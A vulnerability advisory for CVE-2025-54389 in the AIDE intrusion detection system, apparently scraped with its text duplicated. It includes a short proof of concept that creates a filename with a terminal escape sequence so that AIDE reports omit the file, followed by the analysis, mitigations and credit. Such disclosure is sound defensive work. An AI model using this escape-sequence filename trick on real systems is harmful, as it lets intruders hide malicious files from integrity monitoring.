Summary
Rajesh Pangare discovered an improper output neutralization vulnerability in
AIDE, an advanced intrusion detection system. An attacker can craft a malicious
filename by including terminal escape sequences to hide the addition or removal
of the file from the report and/or tamper with the log output. A local user
might exploit this to bypass the AIDE detection of malicious files.
Additionally the output of extended attribute key names and symbolic links
targets are also not properly neutralized.
Project
AIDE (https://aide.github.io)
Affected versions
AIDE <= 0.19.1
CVE ID
CVE-2025-54389
Proof of concept
$ mkdir test
$ touch test/$(echo -e 'malicious-file\033[1A')
$ touch test/regular-testfile
$ aide --config <(printf -- "database_in=file:/dev/null\nroot_prefix = ./test\n/ R") --check
Start timestamp: 2025-08-10 07:23:25 +0000 (AIDE 0.19.1)
AIDE found differences between database and filesystem!!
Root prefix: ./test
Summary:
Total number of entries: 3
Added entries: 3
Removed entries: 0
Changed entries: 0
---------------------------------------------------
Added entries:
---------------------------------------------------
d++++++++++++++++++: /
f++++++++++++++++++: /regular-testfile
---------------------------------------------------
The attributes of the (uncompressed) database(s):
---------------------------------------------------
/dev/null
SHA256 : 47DEQpj8HBSa+/TImW+5JCeuQeRkm5NM
pJWZG3hSuFU=
SHA512 : z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXc
g/SpIdNs6c5H0NE8XYXysP+DGNKHfuwv
Y7kxvUdBeoGlODJ6+SfaPg==
STRIBOG256: P1OaIT6XyALMIp1HTGqjKoJaNgsqkzqU
n9klII2c4bs=
STRIBOG512: jpRdogmqhp8EVZKFKbyuRnnphzq3B7VT
FfVs65i+8Kc2L3FVKDVu6DzaXyqsTGrS
ujpxXBvNgcuOn5C/TBwaig==
SHA512/256: xnK40e9W7Sirh8NiLFEUBpvdOte4+XN0
mNDAHs7wlno=
SHA3-256 : p//G+L8e12ZRwUdWoGHWYvWA/03kO0n6
gtgKS4D4Q0o=
SHA3-512 : pp9zzKI6msXItWfcGFp1bpfJghZP4lhZ
4NHcwUdcgKYVshI68fX5TBHj6UAsOsVY
9QAZnZW20+MBdYWGKB3NJg==
End timestamp: 2025-08-10 07:23:25 +0000 (run time: 0m 0s)
The output correctly shows the addition of regular-testfile but misses the
addition of the malicious file.
This works because the terminal escape sequence moves the cursor one line up
before the new line character of the regular output moves the cursor back to
the beginning of the line containing the malicious file; the next added entry
then overwrites the line.
Please note that the number of added entries is unchanged in the report. For
this POC a user might notice the difference between the number of added entries
and the list of added entries shown in the report, but with a much higher number
of added files the deviation is likely overlooked.
Analysis
The vulnerability is caused by missing output neutralization before printing
the filename, symbolic link target or extended attribute key name to the report
and log output.
This allows a user to craft a filename, symbolic link target or extended
attribute key name including control characters to tamper with or overwrite
previous output.
Mitigation
Upgrade to AIDE v0.19.2 [v0.19.2]
If you cannot upgrade, the issue can be mitigated by configuring AIDE to write
the report output to a regular file (e.g. report_url=file:/var/log/aide.log)
or redirecting stdout to a regular file. Additionally consider redirecting the
log output written to stderr to a regular file. Mind to open the generated
files with a program that escapes terminal sequences correctly.
[v0.19.2] https://github.com/aide/aide/releases/tag/v0.19.2
Credit
The issue was reported by Rajesh Pangare.
raj3shp Finder
Summary
Rajesh Pangare discovered an improper output neutralization vulnerability in
AIDE, an advanced intrusion detection system. An attacker can craft a malicious
filename by including terminal escape sequences to hide the addition or removal
of the file from the report and/or tamper with the log output. A local user
might exploit this to bypass the AIDE detection of malicious files.
Additionally the output of extended attribute key names and symbolic links
targets are also not properly neutralized.
Project
AIDE (https://aide.github.io)
Affected versions
AIDE <= 0.19.1
CVE ID
CVE-2025-54389
Proof of concept
The output correctly shows the addition of
regular-testfilebut misses theaddition of the malicious file.
This works because the terminal escape sequence moves the cursor one line up
before the new line character of the regular output moves the cursor back to
the beginning of the line containing the malicious file; the next added entry
then overwrites the line.
Please note that the number of added entries is unchanged in the report. For
this POC a user might notice the difference between the number of added entries
and the list of added entries shown in the report, but with a much higher number
of added files the deviation is likely overlooked.
Analysis
The vulnerability is caused by missing output neutralization before printing
the filename, symbolic link target or extended attribute key name to the report
and log output.
This allows a user to craft a filename, symbolic link target or extended
attribute key name including control characters to tamper with or overwrite
previous output.
Mitigation
Upgrade to AIDE v0.19.2 [v0.19.2]
If you cannot upgrade, the issue can be mitigated by configuring AIDE to write
the report output to a regular file (e.g.
report_url=file:/var/log/aide.log)or redirecting stdout to a regular file. Additionally consider redirecting the
log output written to
stderrto a regular file. Mind to open the generatedfiles with a program that escapes terminal sequences correctly.
[v0.19.2] https://github.com/aide/aide/releases/tag/v0.19.2
Credit
The issue was reported by Rajesh Pangare.